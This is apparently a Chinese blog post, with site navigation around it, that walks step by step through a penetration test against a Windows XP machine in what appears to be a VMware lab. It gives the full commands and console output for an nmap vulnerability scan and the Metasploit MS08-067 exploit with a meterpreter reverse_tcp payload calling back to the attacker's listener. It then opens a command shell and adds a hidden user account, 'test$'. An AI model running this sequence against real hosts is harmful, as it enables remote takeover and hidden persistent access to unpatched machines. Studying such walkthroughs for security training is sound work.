zoukankan      html  css  js  c++  java

  • 一次真是渗透

    手工进行漏洞检查的最佳途径之一是在metasploit中使用nmap的扫描脚本

    root@bt:/opt/metasploit/msf3# msfconsole

    msf > nmap -sT -A --script=smb-check-vulns -PO 172.16.21.170

    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-11-19 14:58 CST
    Nmap scan report for 172.16.21.170
    Host is up (0.00035s latency).
    Not shown: 990 closed ports
    PORT STATE SERVICE VERSION
    25/tcp open smtp Microsoft ESMTP 6.0.2600.1
    80/tcp open http Microsoft IIS httpd 5.1
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn
    443/tcp open https?
    445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
    1025/tcp open msrpc Microsoft Windows RPC
    1057/tcp open msrpc Microsoft Windows RPC
    1058/tcp open msrpc Microsoft Windows RPC
    5000/tcp open upnp Microsoft Windows UPnP
    MAC Address: 00:0C:29:9F:1E:49 (VMware)
    Device type: general purpose
    Running: Microsoft Windows 2000|XP
    OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
    OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
    Network Distance: 1 hop
    Service Info: Host: lixiuli-vcs86vr; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    | smb-check-vulns:
    | MS08-067: LIKELY VULNERABLE (host stopped responding)
    | Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: TIMEOUT
    | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
    | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
    | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
    |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

    TRACEROUTE
    HOP RTT ADDRESS
    1 0.35 ms 172.16.21.170

    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 151.88 seconds

    发现|MS08-067: LIKELY VULNERABLE (host stopped responding)后,去metasploit中找可用于此漏洞的攻击模块

    msf > search ms08_067   在metasploit框架中查找ms08_06 netapi攻击模块

    Matching Modules
    ================

    Name Disclosure Date Rank Description
    ---- --------------- ---- -----------
    exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption

    msf > use  exploit/windows/smb/ms08_067_netapi     用use命令加载这个模块

    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp      设置攻击载荷为基于windows系统的meterpreter/reverse_tcp,这个载荷在攻击成功后,会从目录主机发起一个反弹连接,连接到lhost中指定的ip地址,这种反弹连接可以让你绕过防火墙的入站流量保护或者穿透nat网关
    payload => windows/meterpreter/reverse_tcp
    msf exploit(ms08_067_netapi) > show targets    大多数msf渗透攻击模块会自动对目标系统类型进行识别,而不需要手工制定此参数,但是ms08-067漏洞的攻击中,通常无法正确的自动识别出系统类型

    Exploit targets:

    Id Name
    -- ----
    0 Automatic Targeting
    1 Windows 2000 Universal
    2 Windows XP SP0/SP1 Universal
    3 Windows XP SP2 English (AlwaysOn NX)
    4 Windows XP SP2 English (NX)
    5 Windows XP SP3 English (AlwaysOn NX)
    6 Windows XP SP3 English (NX)
    7 Windows 2003 SP0 Universal
    8 Windows 2003 SP1 English (NO NX)
    9 Windows 2003 SP1 English (NX)
    10 Windows 2003 SP1 Japanese (NO NX)
    11 Windows 2003 SP2 English (NO NX)
    12 Windows 2003 SP2 English (NX)
    13 Windows 2003 SP2 German (NO NX)
    14 Windows 2003 SP2 German (NX)
    15 Windows XP SP2 Arabic (NX)
    16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
    17 Windows XP SP2 Chinese - Simplified (NX)
    18 Windows XP SP2 Chinese - Traditional (NX)
    19 Windows XP SP2 Czech (NX)
    20 Windows XP SP2 Danish (NX)
    21 Windows XP SP2 German (NX)
    22 Windows XP SP2 Greek (NX)
    23 Windows XP SP2 Spanish (NX)
    24 Windows XP SP2 Finnish (NX)
    25 Windows XP SP2 French (NX)
    26 Windows XP SP2 Hebrew (NX)
    27 Windows XP SP2 Hungarian (NX)
    28 Windows XP SP2 Italian (NX)
    29 Windows XP SP2 Japanese (NX)
    30 Windows XP SP2 Korean (NX)
    31 Windows XP SP2 Dutch (NX)
    32 Windows XP SP2 Norwegian (NX)
    33 Windows XP SP2 Polish (NX)
    34 Windows XP SP2 Portuguese - Brazilian (NX)
    35 Windows XP SP2 Portuguese (NX)
    36 Windows XP SP2 Russian (NX)
    37 Windows XP SP2 Swedish (NX)
    38 Windows XP SP2 Turkish (NX)
    39 Windows XP SP3 Arabic (NX)
    40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
    41 Windows XP SP3 Chinese - Simplified (NX)
    42 Windows XP SP3 Chinese - Traditional (NX)
    43 Windows XP SP3 Czech (NX)
    44 Windows XP SP3 Danish (NX)
    45 Windows XP SP3 German (NX)
    46 Windows XP SP3 Greek (NX)
    47 Windows XP SP3 Spanish (NX)
    48 Windows XP SP3 Finnish (NX)
    49 Windows XP SP3 French (NX)
    50 Windows XP SP3 Hebrew (NX)
    51 Windows XP SP3 Hungarian (NX)
    52 Windows XP SP3 Italian (NX)
    53 Windows XP SP3 Japanese (NX)
    54 Windows XP SP3 Korean (NX)
    55 Windows XP SP3 Dutch (NX)
    56 Windows XP SP3 Norwegian (NX)
    57 Windows XP SP3 Polish (NX)
    58 Windows XP SP3 Portuguese - Brazilian (NX)
    59 Windows XP SP3 Portuguese (NX)
    60 Windows XP SP3 Russian (NX)
    61 Windows XP SP3 Swedish (NX)
    62 Windows XP SP3 Turkish (NX)
    63 Windows 2003 SP2 Japanese (NO NX)

    msf exploit(ms08_067_netapi) > set target 2    指定操作系统类型
    target => 2
    msf exploit(ms08_067_netapi) > set rhost 172.16.21.170   指定目录地址
    rhost => 172.16.21.170
    msf exploit(ms08_067_netapi) > set lhost 172.16.21.17    攻击机的ip地址
    lhost => 172.16.21.17
    msf exploit(ms08_067_netapi) > set lport 8080    攻击机监听的tcp端口
    lport => 8080

    msf  exploit(ms08_067_netapi) > show options   查看参数是否都已经正确设置

    Module options (exploit/windows/smb/ms08_067_netapi):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 172.16.21.170 yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


    Payload options (windows/meterpreter/reverse_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique: seh, thread, process, none
    LHOST 172.16.21.17 yes The listen address
    LPORT 8080 yes The listen port


    Exploit target:

    Id Name
    -- ----
    2 Windows XP SP0/SP1 Universal


    msf exploit(ms08_067_netapi) > exploit  开始

    msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse handler on 172.16.21.17:8080
    [-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
    msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse handler on 172.16.21.17:8080
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (752128 bytes) to 172.16.21.170
    [*] Meterpreter session 1 opened (172.16.21.17:8080 -> 172.16.21.170:1039) at 2013-11-19 15:23:40 +0800

    exploit命令初始化攻击环境,并对目标进行攻击尝试,这次攻击时成功的。

    meterpreter > pwd
    C:WINDOWSsystem32

    meterpreter > shell

    Process 732 created.
    Channel 1 created.
    Microsoft Windows XP [ 5.1.2600]
    (C) 1985-2001 Microsoft Corp.

    C:windows>net user test$ 123456 /add

    去被攻击机器170上看一下:
  • 相关阅读:
    js炫酷效果
    程序员的执着
    [心得]docker学习笔记
    [心得笔记]多线程之间的内存可见性问题
    Docker入门
    [心得体会]jvm
    redis学习总结
    [心得]redis集群环境搭建的错误
    Linux安装mysql5.7版本
    Cent OS下安装JDK11
  • 原文地址:https://www.cnblogs.com/seasonsstory/p/3431613.html
Copyright © 2011-2022 走看看